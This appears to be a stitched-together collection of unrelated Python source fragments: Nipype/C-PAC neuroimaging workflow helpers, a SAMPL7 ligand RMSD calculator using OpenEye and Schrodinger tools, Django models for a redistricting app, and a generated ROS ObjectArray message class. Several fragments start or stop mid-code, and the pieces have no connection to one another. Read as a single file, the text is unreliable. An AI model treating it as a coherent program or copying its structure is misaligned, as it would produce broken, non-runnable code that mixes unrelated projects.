workflow.connect(node, out_file, fisher_z_score_std,
'inputspec.timeseries_one_d')
strat.append_name(fisher_z_score_std.name)
strat.update_resource_pool({'{0}_fisher_zstd'.format(output_name): (fisher_z_score_std, 'outputspec.fisher_z_score_img')})
return strat
def output_smooth(workflow, output_name, mask_name, fwhm,
strat, num_strat, map_node=False):
if map_node:
output_smooth = pe.MapNode(interface=fsl.MultiImageMaths(),
name='{0}_smooth_{1}'.format(output_name,
num_strat),
iterfield=['in_file'])
else:
output_smooth = pe.Node(interface=fsl.MultiImageMaths(),
name='{0}_smooth_{1}'.format(output_name,
num_strat))
# TODO review connetion to config, is the node really necessary?
inputnode_fwhm = pe.Node(util.IdentityInterface(fields=['fwhm']),
name='fwhm_input_{0}_{1}'.format(output_name, num_strat))
inputnode_fwhm.iterables = ("fwhm", fwhm)
# get the resource to be smoothed
node, out_file = strat[output_name]
workflow.connect(node, out_file, output_smooth, 'in_file')
# get the parameters for fwhm
workflow.connect(inputnode_fwhm, ('fwhm', set_gauss),
output_smooth, 'op_string')
# get the mask
if type(mask_name) == str:
node, out_file = strat[mask_name]
workflow.connect(node, out_file,
output_smooth, 'operand_files')
else:
# mask_name is a direct file path and not the name of a
# resource pool key
workflow.connect(mask_name, 'local_path',
output_smooth, 'operand_files')
strat.append_name(output_smooth.name)
strat.update_resource_pool({'{0}_smooth'.format(output_name): (output_smooth, 'out_file')})
return strat
def calc_avg(workflow, output_name, strat, num_strat, map_node=False):
"""Calculate the average of an output using AFNI 3dmaskave."""
if map_node:
calc_average = pe.MapNode(interface=preprocess.Maskave(),
name='{0}_mean_{1}'.format(output_name,
num_strat),
iterfield=['in_file'])
mean_to_csv = pe.MapNode(function.Function(input_names=['in_file',
'output_name'],
output_names=[
'output_mean'],
function=extract_output_mean,
as_module=True),
name='{0}_mean_to_txt_{1}'.format(output_name,
num_strat),
iterfield=['in_file'])
else:
calc_average = pe.Node(interface=preprocess.Maskave(),
name='{0}_mean_{1}'.format(output_name,
num_strat))
mean_to_csv = pe.Node(function.Function(input_names=['in_file',
'output_name'],
output_names=['output_mean'],
function=extract_output_mean,
as_module=True),
name='{0}_mean_to_txt_{1}'.format(output_name,
num_strat))
mean_to_csv.inputs.output_name = output_name
node, out_file = strat[output_name]
workflow.connect(node, out_file, calc_average, 'in_file')
workflow.connect(calc_average, 'out_file', mean_to_csv, 'in_file')
strat.append_name(calc_average.name)
strat.update_resource_pool({
'output_means.@{0}_average'.format(output_name): (mean_to_csv, 'output_mean')
})
return strat
def ants_apply_warps_func_mni(
workflow, strat, num_strat, num_ants_cores,
input_node, input_outfile,
ref_node, ref_outfile, standard,
func_name, interp,
input_image_type
):
"""Apply the functional-to-structural and structural-to-template warps to
the 4D functional time-series to warp it to template space.
Parameters
----------
workflow: Nipype workflow object
the workflow containing the resources involved
strat: C-PAC Strategy object
a strategy with one or more resource pools
num_strat: int
the number of strategy objects
num_ants_cores: int
the number of CPU cores dedicated to ANTS anatomical-to-standard
registration
input_node: Nipype pointer
pointer to the node containing the 4D functional time-series (often
the leaf node)
input_outfile: Nipype pointer
pointer to the output of the node, i.e. the 4D functional time-series
itself
ref_node: Nipype pointer
pointer to the node containing the reference volume for the C3D
FSL-to-ITK affine conversion (often the mean of the functional
time-series, which is a single volume)
ref_outfile: Nipype pointer
pointer to the output of ref_node, i.e. the reference volume itself
standard: str
file path to the template brain used for functional-to-template
registration
func_name: str
what the name of the warped functional should be when written to the
resource pool
interp: str
which interpolation to use when applying the warps
input_image_type: int
argument taken by the ANTs apply warp tool; in this case, should be
3 for 4D functional time-series
"""
# converts FSL-format .mat affine xfm into ANTS-format
# .txt; .mat affine comes from Func->Anat registration
fsl_to_itk_func_mni = create_wf_c3d_fsl_to_itk(
name='fsl_to_itk_%s_%d' % (func_name, num_strat)
)
# collects series of warps to be applied
collect_transforms_func_mni = \
create_wf_collect_transforms(
name='collect_transforms_%s_%d' % (func_name, num_strat)
)
# apply ants warps
apply_ants_warp_func_mni = \
create_wf_apply_ants_warp(name='apply_ants_warp_%s_%d' % (func_name, num_strat),
ants_threads=int(num_ants_cores))
apply_ants_warp_func_mni.inputs.inputspec.reference_image = standard
apply_ants_warp_func_mni.inputs.inputspec.dimension = 3
apply_ants_warp_func_mni.inputs.inputspec.interpolation = interp
# input_image_type:
# (0 or 1 or 2 or 3)
# Option specifying the input image type of scalar
# (default), vector, tensor, or time series.
apply_ants_warp_func_mni.inputs.inputspec. \
input_image_type = input_image_type
# convert the .mat from linear Func->Anat to
# ANTS format
node, out_file = strat['functional_to_anat_linear_xfm']
workflow.connect(node, out_file, fsl_to_itk_func_mni,
'inputspec.affine_file')
node, out_file = strat["anatomical_brain"]
workflow.connect(node, out_file, fsl_to_itk_func_mni,
'inputspec.reference_file')
workflow.connect(ref_node, ref_outfile,
fsl_to_itk_func_mni,
'inputspec.source_file')
# Field file from anatomical nonlinear registration
node, out_file = strat['anatomical_to_mni_nonlinear_xfm']
workflow.connect(node, out_file,
collect_transforms_func_mni,
'inputspec.warp_file')
# initial transformation from anatomical registration
node, out_file = strat['ants_initial_xfm']
workflow.connect(node, out_file,
collect_transforms_func_mni,
'inputspec.linear_initial')
# affine transformation from anatomical registration
node, out_file = strat['ants_affine_xfm']
workflow.connect(node, out_file,
collect_transforms_func_mni,
'inputspec.linear_affine')
# rigid transformation from anatomical registration
node, out_file = strat['ants_rigid_xfm']
workflow.connect(node, out_file,
collect_transforms_func_mni,
'inputspec.linear_rigid')
# Premat from Func->Anat linear reg and bbreg
# (if bbreg is enabled)
workflow.connect(fsl_to_itk_func_mni,
'outputspec.itk_transform',
collect_transforms_func_mni,
'inputspec.fsl_to_itk_affine')
# this <node, out_file> pulls in directly because
# it pulls in the leaf in some instances
workflow.connect(input_node,
input_outfile,
apply_ants_warp_func_mni,
'inputspec.input_image')
workflow.connect(collect_transforms_func_mni,
'outputspec.transformation_series',
apply_ants_warp_func_mni,
'inputspec.transforms')
strat.update_resource_pool({
func_name: (apply_ants_warp_func_mni, 'outputspec.output_image')
})
strat.append_name(apply_ants_warp_func_mni.name)
return apply_ants_warp_func_mni
def ants_apply_inverse_warps_template_to_func(
workflow, strat, num_strat, num_ants_cores, input_node, input_outfile,
ref_node, ref_outfile, func_name, interp, input_image_type
):
"""Apply the functional-to-structural and structural-to-template warps
inversely to functional time-series in template space to warp it back to
native functional space.
Parameters
----------
workflow: Nipype workflow object
the workflow containing the resources involved
strat: C-PAC Strategy object
a strategy with one or more resource pools
num_strat: int
the number of strategy objects
num_ants_cores: int
the number of CPU cores dedicated to ANTS anatomical-to-standard
registration
input_node: Nipype pointer
pointer to the node containing the 4D functional time-series (often
the leaf node)
input_outfile: Nipype pointer
pointer to the output of the node, i.e. the 4D functional time-series
itself
ref_node: Nipype pointer
pointer to the node containing the reference volume for the C3D
FSL-to-ITK affine conversion (often the mean of the functional
time-series, which is a single volume)
ref_outfile: Nipype pointer
pointer to the output of ref_node, i.e. the reference volume itself
func_name: str
what the name of the warped functional should be when written | |
<reponame>samplchallenges/SAMPL7<filename>protein_ligand/Analysis/Scripts/pkganalysis/RMSD_calculator.py<gh_stars>10-100
#!/usr/bin/env python
__author__ = "<NAME>"
__email__ = "<EMAIL>"
import shutil
import glob
import pickle
import logging
import sys
import os
import time
import subprocess
import argparse
def mcs(ref_mol, fit_mol):
#do the mcs search and return OEMatch object.
#ignore Hydrogen
OESuppressHydrogens(fit_mol)
OESuppressHydrogens(ref_mol)
#set atom and bond expression
atomexpr = OEExprOpts_AtomicNumber
bondexpr = 0
#do the mcs search, using defined atom, bond expression options
mcss = OEMCSSearch( ref_mol, atomexpr, bondexpr, True)
mcss.SetMCSFunc(OEMCSMaxAtomsCompleteCycles(1.5) )
#create a new match object to store mcs search info.
new_match_list = []
new_match_dic = {}
i = 0
j = 0
for match1 in mcss.Match(ref_mol):
i += 1
#write out match1 molecule
mol1 = OEGraphMol()
OESubsetMol(mol1,match1, True)
ofs1 = oemolostream("match1_%s.pdb"%i)
OEWriteMolecule(ofs1, mol1)
ofs1.close()
for match2 in mcss.Match(fit_mol):
j += 1
check_list = []
#write out match2 molecule
new_match = OEMatch()
mol2 = OEGraphMol()
OESubsetMol(mol2,match2, True)
ofs2 = oemolostream("match2_%s.pdb"%j)
OEWriteMolecule(ofs2, mol2)
ofs2.close()
for mp1, mp2 in zip(match1.GetAtoms(), match2.GetAtoms()):
ref_name = mp1.target.GetName().strip()
fit_name = mp2.target.GetName().strip()
new_match.AddPair (mp1.target, mp2.target)
#store the match info
new_match_list.append(new_match)
new_match_dic[new_match] = (["match1_%s_vs_match2_%s"%(i,j), check_list ])
return new_match_dic
def rmsd_mcss(ref_struc, fit_struc):
#This function use the openeye mcss calculation to get the atom mapping first and then calculate RMSD, if multiple atom mapping is avaiable, the lowest RMSM will be returned
print('we are now in the rmsd_mcss', ref_struc, fit_struc)
reffs = oemolistream()
reffs.open(ref_struc)
fitfs = oemolistream()
fitfs.open(fit_struc)
refmol = OEGraphMol()
OEReadMolecule(reffs, refmol)
for fitmol in fitfs.GetOEGraphMols():
#get all possible matching
ss = mcs(refmol, fitmol,)
mcss_rmsd_list = []
match_info = []
for mcss in ss.keys():
#calculate the RMSD based on atom mapping
mcss_rmsd = OERMSD(refmol, fitmol, mcss)
mcss_rmsd_list.append(mcss_rmsd)
match_info.append(ss[mcss])
print( ref_struc)
print( fit_struc)
print(mcss_rmsd_list)
try:
minimum_mcss = min(mcss_rmsd_list)
return minimum_mcss
except:
return False
def wait_and_check (filename, timestep = 100, how_many_times = 1000):
#add some relaxing time
count = 0
while (count < how_many_times):
if not os.path.isfile(filename):
time.sleep(timestep)
print('Inside the wait loop check the current wait time',filename,count,count*timestep)
count = count + 1
else:
print('we are now exiting at this count:',filename,count)
return True
return False
def extract_ligand_from_complex (complex_pdb_file, ligand_pdb_file, ligand_info = "UNL"):
#here the default ligand info is the residue name OpenEye assigns for unknown ligands, UNL.
print('we are now entering extract ligand from complex', complex_pdb_file, ligand_pdb_file)
complex_file = open(complex_pdb_file, "r")
complex_lines = complex_file.readlines()
complex_file.close()
ligid = ligand_info.split("-")
ligand_lines = []
for complex_line in complex_lines:
if (complex_line[17:20].strip()==ligid[0] and complex_line[22:26].strip()==ligid[1]):
ligand_lines.append(complex_line)
ligand_file = open(ligand_pdb_file, "w")
ligand_file.writelines(ligand_lines)
ligand_file.close()
def convert_ligand_format (input_ligand, output_ligand):
print('We are now converting the ligand format:', input_ligand, output_ligand)
try:
mol = OEMol()
ifile = oemolistream(input_ligand)
OEReadMolecule(ifile, mol)
ifile.close()
except:
logging.info(f"This ligand '{input_ligand}' cannot be read; check the format" )
return False
try:
ofile = oemolostream(output_ligand)
OEWriteMolecule(ofile, mol)
except:
logging.info(f"This ligand '{input_ligand}' cannot be written to '{output_ligand}'; please check format and the validity of the molecule." )
return False
return True
def merge_two_pdb (receptor, ligand, complex_pdb):
print('we need to merge two pdbs:',receptor, ligand, complex_pdb)
#subprocess.getoutput("babel -ipdb %s -opdb %s"%(receptor, receptor) )
#subprocess.getoutput("babel -ipdb %s -opdb %s"%(ligand, ligand) )
folder = os.getcwd()
#---need to add this to fix corrupted REMARK sections in participant PDB files
complex_lines = []
f1 = open(receptor, "r")
protein_lines = f1.readlines()
f1.close()
for p_line in protein_lines:
if p_line [:6] not in ["CONECT", "ENDMDL" ] and p_line [:3] not in ["END"]:
complex_lines.append(p_line)
complex_lines.append("TER \n")
f2 = open(ligand, "r")
ligand_lines = f2.readlines()
f2.close()
for l_line in ligand_lines:
if l_line [:6] not in ["REMARK", "MODEL ", "CONECT", "ENDMDL"] and l_line not in ["END"]:
complex_lines.append(l_line)
f3 = open(complex_pdb, "w")
f3.writelines(complex_lines)
f3.close()
def align_protein (template_complex, input_complex, output_complex):
#use schrodinger binding site alignment to get the aligned structure
print('we are attempting the following alignment:',template_complex, input_complex, output_complex)
return subprocess.getoutput("$SCHRODINGER/utilities/align_binding_sites %s %s -o %s"%(template_complex, input_complex, output_complex))
def rmsd_calculation(input_ligand, template_ligand, input_protein, template_protein_complex, realignment = False ):
#print(input_ligand)
#print(template_ligand)
#print(input_protein)
#quit()
input_ligand_title, input_ligand_extension = os.path.splitext(input_ligand)
template_ligand_title, template_ligand_extension = os.path.splitext(template_ligand)
if realignment:
###do the realignment first###
#step 1: combine ligand and protein
input_ligand_pdb = input_ligand_title + "_ligand.pdb"
try:
#step 2: convert mol file into pdb format
convert_ligand_format(input_ligand, input_ligand_pdb)
logging.info("Successfully convert %s to %s..."%(input_ligand, input_ligand_pdb))
except:
logging.info("\tFatal Error: This ligand %s cannot be convert to pdb format"%(input_ligand))
return "N/A"
input_ligand_protein_complex = input_ligand_title + "_complex.pdb"
#step 3: merge the ligand and receptor together
merge_two_pdb (input_protein, input_ligand_pdb, input_ligand_protein_complex)
aligned_ligand_protein_complex = input_ligand_title + "_vs_" + template_ligand_title+ "_complex_aligned.pdb"
#step 4: align the input complex onto template complex
try:
align_protein (template_protein_complex, input_ligand_protein_complex, aligned_ligand_protein_complex )
#set a relaxing time to let the alignment finish
#default to check every 5 second and maximum calculation time is 500 second
time_check_frequence = 100
how_many_check_point = 1000
total_wait_time = time_check_frequence * how_many_check_point
if wait_and_check(aligned_ligand_protein_complex, timestep = time_check_frequence, how_many_times = how_many_check_point):
logging.info("Successfully align %s onto %s and get the aligned structure %s"%(input_ligand_protein_complex, template_protein_complex, aligned_ligand_protein_complex))
else:
logging.info("The alignment from %s onto %s didn't finish in %s second... Need to break"%(input_ligand_protein_complex, template_protein_complex, total_wait_time))
return "N/A"
except:
logging.info("\tFatal Error: Cannot align %s onto %s"%(input_ligand_protein_complex, template_protein_complex))
return "N/A"
#step 5: split the aligned protein to get aligned ligand
aligned_input_ligand = input_ligand_title + "_vs_" + template_ligand_title + "_ligand_aligned.pdb"
try:
extract_ligand_from_complex(aligned_ligand_protein_complex, aligned_input_ligand, ligand_info = "UNL")
logging.info("Successfully extract ligand file %s from aligned complex %s"%(aligned_input_ligand, aligned_ligand_protein_complex))
except:
logging.info("\tFatal Error: Cannot extract ligand file %s from aligned complex %s"%(aligned_input_ligand, aligned_ligand_protein_complex))
return "N/A"
#step 6: calculate the RMSD between the aligned ligand and the template ligand
try:
print('step 6:', template_ligand, aligned_input_ligand)
rmsd = rmsd_mcss(template_ligand, aligned_input_ligand)
logging.info("Successfully calculate the rmsd between template ligand %s and input aligned ligand %s, get the rmsd = %s"%(template_ligand, aligned_input_ligand, rmsd))
except:
logging.info("\tFatal Error: Cannont get the rmsd between template ligand %s and input aligned ligand %s"%(template_ligand, aligned_input_ligand))
rmsd = "N/A"
#step 7: write out result to a log file
out_log = open("%s_vs_%s_aligned.log"%(input_ligand_title, template_ligand_title), "w")
out_log.writelines("rmsd: %s"%rmsd)
out_log.close()
else:
#calculate the ligand RMSD without realignment
try:
rmsd = rmsd_mcss(template_ligand, input_ligand)
logging.info("Successfully calculate the rmsd between template ligand %s and input ligand %s, get the rmsd = %s"%(template_ligand, input_ligand, rmsd))
except:
logging.info("\tFatal Error: Cannont get the rmsd between template ligand %s and input ligand %s"%(template_ligand, input_ligand))
rmsd = "N/A"
out_log = open("%s_vs_%s.log"%(input_ligand_title,template_ligand_title), "w")
out_log.writelines("rmsd: %s"%rmsd)
out_log.close()
return rmsd
def copy_template(template_folder_path, submitted_folder_path):
all_template_files = glob.glob("%s/*"%(template_folder_path))
for template_file in all_template_files:
shutil.copy(template_file, submitted_folder_path)
def main_rmsd (submitted_folder_path, template_folder_path, realigned = True):
#inside the submission folder, search for all submitted mol files and extract the corresponding temaplte file from the template folder and calculate the rmsd
copy_template (template_folder_path, submitted_folder_path)
os.chdir(submitted_folder_path)
if realigned:
out_rmsd_csv = open("Overall_rmsd_realigned.csv", "w")
else:
out_rmsd_csv = open("Overall_rmsd.csv", "w")
all_rmsd_data = ["%-20s,%-20s,%-20s\n"%("Submitted_Ligand", "Template_Ligand", "RMSD")]
for input_ligand in glob.glob("*.mol"):
#example mol file format: 3OOF-FXR_13-2.mol
print('we are looping through:', input_ligand)
ligand_ID = input_ligand.split("-")[1]
input_ligand_title = os.path.splitext(input_ligand)[0]
input_protein = input_ligand_title + ".pdb"
template_ligand_suffix = "_ligand1.pdb"
template_protein_suffix = ".pdb"
all_template_ligands = glob.glob("%s-*%s"%(ligand_ID, template_ligand_suffix))
#print(ligand_ID)
#print(input_ligand_title)
#print(input_protein)
#print(template_ligand_suffix)
#print(all_template_ligands)
for template_ligand in all_template_ligands:
template_protein_complex = template_ligand.split(template_ligand_suffix)[0] + template_protein_suffix
#here apply the rmsd_calculation
this_rmsd = rmsd_calculation(input_ligand, template_ligand, input_protein, template_protein_complex, realignment = realigned )
new_data = "%-20s,%-20s,%-20s\n"%(input_ligand, template_ligand, this_rmsd)
all_rmsd_data.append(new_data)
for file in os.listdir(".."):
if os.path.isfile(file) and "match" in file:
try:
os.remove(file)
print('we have succesfully removed:',file)
except:
print('cannot remove file:', file)
print()
out_rmsd_csv.writelines(all_rmsd_data)
#clean up atom mapping files
all_mapping_files = glob.glob("match*")
for mapping_file in all_mapping_files:
os.remove(mapping_file)
if ("__main__") == (__name__):
from argparse import ArgumentParser
desc = """
This code was design to evaluate the pose prediction of D3R Grand Challenge 2
For more infomation about the challenge, please visit https://drugdesigndata.org/
######Usage exmaple######
### Use the alignment option to realign the submitted structure onto the crystal position###
### Here the answer file under folder template_at_crystal_position should be used ###
# python RMSD_calculator.py --submitdir ./example_submission_folder --templatedir ./template_at_crystal_position --alignment
### Directly calculate the RMSDs between submitted structure with the template ligand ###
### Here the answer file under folder template_at_APO_position should be used ###
# python RMSD_calculator.py --submitdir ./example_submission_folder --templatedir ./template_at_APO_position
#Note for FXR system, we notice that using the alignment option will get a slightly lower RMSDs, so our reported RMSDs are RMSDs with the alignment method.
#########################
######Output#######
### Overall_rmsd_realigned.csv/Overall_rmsd.csv (depend on usage the alignment option)
### Output files are under example_submission_folder
###################
######Dependencies######
#openeye oechem tools for RMSD calculation
#schrodinger tools for alignment if use the alignment option
########################
"""
| |
"""
Define the models used by the redistricting app.
The classes in redistricting.models define the data models used in the
application. Each class relates to one table in the database; foreign key
fields may define a second, intermediate table to map the records to one
another.
This file is part of The Public Mapping Project
https://github.com/PublicMapping/
License:
Copyright 2010-2012 <NAME>, <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Author:
<NAME>, <NAME>, <NAME>
"""
from celery.task import task
from django.core.exceptions import ValidationError
from django.contrib.gis.db import models
from django.contrib.gis.geos import (MultiPolygon, Polygon, GEOSGeometry,
GEOSException, GeometryCollection, Point)
from django.contrib.gis.db.models.query import GeoQuerySet
from django.contrib.gis.db.models import Collect, Extent
from django.contrib.auth.models import User
from django.db.models import Sum, Max, Q, Count
from django.db.models.signals import pre_save, post_save, m2m_changed
from django.db import connection, transaction
from django.forms import ModelForm
from django.conf import settings
from django.utils import translation
from django.utils.translation import ugettext as _
from django.template.loader import render_to_string
from django_comments.models import Comment
from django.contrib.contenttypes.models import ContentType
from django.template.defaultfilters import title
from redistricting.calculators import PolsbyPopper, Contiguity, SumValues
from tagging.models import TaggedItem, Tag
from tagging.registry import register
from datetime import datetime
from copy import copy
import json
from decimal import *
from operator import attrgetter
import polib
from traceback import format_exc
import os, sys, cPickle, types, tagging, re, logging
logger = logging.getLogger(__name__)
# Caches for po files
I18N_CACHE = {}
class BaseModel(models.Model):
"""
A base class for models that have short labels, labels, and long descriptions.
Any class that extends this base class must have a 'name' field.
"""
def __init__(self, *args, **kwargs):
"""
Initialize the message file cache.
"""
super(BaseModel, self).__init__(*args, **kwargs)
# Hardcoding to avoid a bug in Django 1.8 get_language
# (refer to https://github.com/django-parler/django-parler/issues/90)
lang = translation.get_language() or settings.LANGUAGE_CODE
if not lang in I18N_CACHE:
try:
path = os.path.join(
settings.STATIC_ROOT,
'../locale/%s/LC_MESSAGES/xmlconfig.mo' % lang)
path = os.path.normpath(path)
I18N_CACHE[lang] = polib.mofile(path)
except Exception, ex:
path = os.path.join(
settings.STATIC_ROOT,
'../locale/%s/LC_MESSAGES/xmlconfig.po' % lang)
path = os.path.normpath(path)
I18N_CACHE[lang] = polib.pofile(path)
def get_short_label(self):
"""
Get the short label (a.k.a. title) of the object.
"""
msgid = u'%s short label' % self.name
try:
lang = translation.get_language()
return I18N_CACHE[lang].find(msgid).msgstr
except Exception, ex:
logger.debug('Cannot find msgid %s, fallback to msgid', msgid)
return msgid
def get_label(self):
"""
Get the label of the object. This is longer than the short label, and
shorter than the description. Most often, this is the default text
representation of an object.
"""
msgid = u'%s label' % self.name
try:
lang = translation.get_language()
return I18N_CACHE[lang].find(msgid).msgstr
except Exception, ex:
logger.debug('Cannot find msgid %s, fallback to msgid', msgid)
return msgid
def get_long_description(self):
"""
Get the description of the object. This is a verbose description of the
object.
"""
msgid = u'%s long description' % self.name
try:
lang = translation.get_language()
return I18N_CACHE[lang].find(msgid).msgstr
except Exception, ex:
logger.debug('Cannot find msgid %s, fallback to msgid', msgid)
return msgid
class Meta:
abstract = True
class Subject(BaseModel):
"""
A classification of a set of Characteristics.
A Subject classifies theC haracteristics of a Geounit. Or, each Geounit
has one Characteristic per Subject.
If you think about it in GIS terms:
a Geounit is a Feature,
a Subject is an Attribute on a Geounit, and
a Characteristic is a Data Value for a Subject.
"""
# The name of the subject (POPTOT)
name = models.CharField(max_length=50)
# If this subject should be displayed as a percentage,
# a district's value for this subject will be divided by
# the value for the given subject.
# A null value indicates that the subject is not a percentage
percentage_denominator = models.ForeignKey(
'Subject', null=True, blank=True)
# A flag that indicates if this subject should be displayed.
is_displayed = models.BooleanField(default=True)
# The position that this subject should be in, relative to all other
# Subjects, when viewing the subjects in a list.
sort_key = models.PositiveIntegerField(default=1)
# The way this Subject's values should be represented.
format_string = models.CharField(max_length=50, blank=True)
# The version of this subject, to keep track of uploaded changes
version = models.PositiveIntegerField(default=1)
class Meta:
"""
Additional information about the Subject model.
"""
# The default method of sorting Subjects should be by 'sort_key'
ordering = ['sort_key']
# A unique constraint on the name
unique_together = ('name', )
def __unicode__(self):
"""
Represent the Subject as a unicode string. This is the Subject's
display name.
"""
return self.get_label()
class ChoicesEnum(object):
"""
Helper class for defining enumerated choices in a Model
"""
def __init__(self, *args, **kwargs):
super(ChoicesEnum, self).__init__()
vals = {}
for key, val in kwargs.iteritems():
vals[key] = val
object.__setattr__(self, "_vals", vals)
def choices(self):
cho = []
vals = object.__getattribute__(self, "_vals")
for key, val in vals.iteritems():
cho.append(val)
cho.sort()
return cho
def __getattr__(self, name):
return object.__getattribute__(self, "_vals")[name][0]
def __setattr__(self, name, value):
object.__setattr__(self, "_vals")[name][0] = value
def __delattr__(self, name):
del object.__setattr__(self, "_vals")[name]
UploadedState = ChoicesEnum(
UNKNOWN=('NA', 'Not Available'),
UPLOADING=('UL', 'Uploading'),
CHECKING=('CH', 'Checking'),
DONE=('OK', 'Done'),
ERROR=('ER', 'Error'),
)
class SubjectUpload(models.Model):
"""
A set of uploaded subjects. This is primarily used to prevent collisions
during the long verification step.
"""
# The automatically generated file name
processing_filename = models.CharField(max_length=256)
# The user-specified file name
upload_filename = models.CharField(max_length=256)
# Subject name
subject_name = models.CharField(max_length=50)
# The status of the uploaded subject
status = models.CharField(
max_length=2,
choices=UploadedState.choices(),
default=UploadedState.UNKNOWN)
# The task ID that is processing this uploaded subject
task_id = models.CharField(max_length=36)
class SubjectStage(models.Model):
"""
A quarantine table for uploaded subjects. This model stores temporary subject
datasets that are being imported into the system.
"""
# An identifier to discriminate between multiple uploads.
upload = models.ForeignKey(SubjectUpload)
# The GEOID, or FIPS ID of the geounit
portable_id = models.CharField(max_length=50)
# The data value of the geounit.
number = models.DecimalField(max_digits=12, decimal_places=4)
class Region(BaseModel):
"""
A region is a compartmentalized area of geography, legislative bodies,
and validation criteria. Each region shares the base geography, but may
be active over a subsection. In addition, legislative bodies are contained
within one region at a time.
"""
# The name of this region
name = models.CharField(max_length=256)
# The sorting order for this region relative to other regions
sort_key = models.PositiveIntegerField(default=0)
def __unicode__(self):
"""
Represent the Region as a unicode string. This is the Region's name.
"""
return self.name
class Meta:
"""
Additional information about the Region model.
"""
# A unique constraint on the name
unique_together = ('name', )
class LegislativeBody(BaseModel):
"""
A legislative body that plans belong to. This is to support the
scenario where one application is supporting both "Congressional"
and "School District" contests, for example.
"""
# The name of this legislative body
name = models.CharField(max_length=256)
# The maximum number of districts in this body
max_districts = models.PositiveIntegerField()
# Whether or not districts of this legislative body are allowed multi-members
multi_members_allowed = models.BooleanField(default=False)
# The format to be used for displaying a map label of a multi-member district.
# This format string will be passed to python's 'format' function with the named
# arguments: 'label' (district label) and 'num_members' (number of representatives)
# For example: "{label} - [{num_members}]" will display "District 5 - [3]" for a district named
# "District 5" that is configured with 3 representatives.
multi_district_label_format = models.CharField(
max_length=32, default='{label} - [{num_members}]')
# The minimimum number of multi-member districts allowed in a plan.
min_multi_districts = models.PositiveIntegerField(default=0)
# The maximum number of multi-member districts allowed in a plan.
max_multi_districts = models.PositiveIntegerField(default=0)
# The minimimum number of members allowed in a multi-member district.
min_multi_district_members = models.PositiveIntegerField(default=0)
# The maximimum number of members allowed in a multi-member district.
max_multi_district_members = models.PositiveIntegerField(default=0)
# The minimumum total number of members allowed in a plan.
min_plan_members = models.PositiveIntegerField(default=0)
# The maximumum total number of members allowed in a plan.
max_plan_members = models.PositiveIntegerField(default=0)
# A flag indicating if this legislative body contains community maps
is_community = models.BooleanField(default=False)
# Where in the list of legislative bodies should this item appear?
| |
<gh_stars>0
# This Python file uses the following encoding: utf-8
"""autogenerated by genpy from derived_object_msgs/ObjectArray.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import geometry_msgs.msg
import derived_object_msgs.msg
import shape_msgs.msg
import protocol.std_msgs.msg as std_msgs
class ObjectArray(genpy.Message):
_md5sum = "492c83cd255b9a57845d0c197d7977be"
_type = "derived_object_msgs/ObjectArray"
_has_header = True #flag to mark the presence of a Header object
_full_text = """std_msgs/Header header
derived_object_msgs/Object[] objects
================================================================================
MSG: std_msgs/Header
# Standard metadata for higher-level stamped data types.
# This is generally used to communicate timestamped data
# in a particular coordinate frame.
#
# sequence ID: consecutively increasing ID
uint32 seq
#Two-integer timestamp that is expressed as:
# * stamp.sec: seconds (stamp_secs) since epoch (in Python the variable is called 'secs')
# * stamp.nsec: nanoseconds since stamp_secs (in Python the variable is called 'nsecs')
# time-handling sugar is provided by the client library
time stamp
#Frame this data is associated with
# 0: no frame
# 1: global frame
string frame_id
================================================================================
MSG: derived_object_msgs/Object
# This represents a detected or tracked object with reference coordinate frame and timestamp.
std_msgs/Header header
# The id of the object (presumably from the detecting sensor).
uint32 id
# A Detected object is one which has been seen in at least one scan/frame of a sensor.
# A Tracked object is one which has been correlated over multiple scans/frames of a sensor.
# An object which is detected can only be assumed to have valid pose and shape properties.
# An object which is tracked should also be assumed to have valid twist and accel properties.
uint8 detection_level
uint8 OBJECT_DETECTED=0
uint8 OBJECT_TRACKED=1
# A Classified object is one which has been identified as a certain object type.
# Classified objects should have valid classification, classification_certainty, and classification_age properties.
bool object_classified
# The detected position and orientation of the object.
geometry_msgs/Pose pose
# The detected linear and angular velocities of the object.
geometry_msgs/Twist twist
# The detected linear and angular accelerations of the object.
geometry_msgs/Accel accel
# (OPTIONAL) The polygon defining the detection points at the outer edges of the object.
geometry_msgs/Polygon polygon
# A shape conforming to the outer bounding edges of the object.
shape_msgs/SolidPrimitive shape
# The type of classification given to this object.
uint8 classification
uint8 CLASSIFICATION_UNKNOWN=0
uint8 CLASSIFICATION_UNKNOWN_SMALL=1
uint8 CLASSIFICATION_UNKNOWN_MEDIUM=2
uint8 CLASSIFICATION_UNKNOWN_BIG=3
uint8 CLASSIFICATION_PEDESTRIAN=4
uint8 CLASSIFICATION_BIKE=5
uint8 CLASSIFICATION_CAR=6
uint8 CLASSIFICATION_TRUCK=7
uint8 CLASSIFICATION_MOTORCYCLE=8
uint8 CLASSIFICATION_OTHER_VEHICLE=9
uint8 CLASSIFICATION_BARRIER=10
uint8 CLASSIFICATION_SIGN=11
# The certainty of the classification from the originating sensor.
# Higher value indicates greater certainty (MAX=255).
# It is recommended that a native sensor value be scaled to 0-255 for interoperability.
uint8 classification_certainty
# The number of scans/frames from the sensor that this object has been classified as the current classification.
uint32 classification_age
================================================================================
MSG: geometry_msgs/Pose
# A representation of pose in free space, composed of position and orientation.
Point position
Quaternion orientation
================================================================================
MSG: geometry_msgs/Point
# This contains the position of a point in free space
float64 x
float64 y
float64 z
================================================================================
MSG: geometry_msgs/Quaternion
# This represents an orientation in free space in quaternion form.
float64 x
float64 y
float64 z
float64 w
================================================================================
MSG: geometry_msgs/Twist
# This expresses velocity in free space broken into its linear and angular parts.
Vector3 linear
Vector3 angular
================================================================================
MSG: geometry_msgs/Vector3
# This represents a vector in free space.
# It is only meant to represent a direction. Therefore, it does not
# make sense to apply a translation to it (e.g., when applying a
# generic rigid transformation to a Vector3, tf2 will only apply the
# rotation). If you want your data to be translatable too, use the
# geometry_msgs/Point message instead.
float64 x
float64 y
float64 z
================================================================================
MSG: geometry_msgs/Accel
# This expresses acceleration in free space broken into its linear and angular parts.
Vector3 linear
Vector3 angular
================================================================================
MSG: geometry_msgs/Polygon
#A specification of a polygon where the first and last points are assumed to be connected
Point32[] points
================================================================================
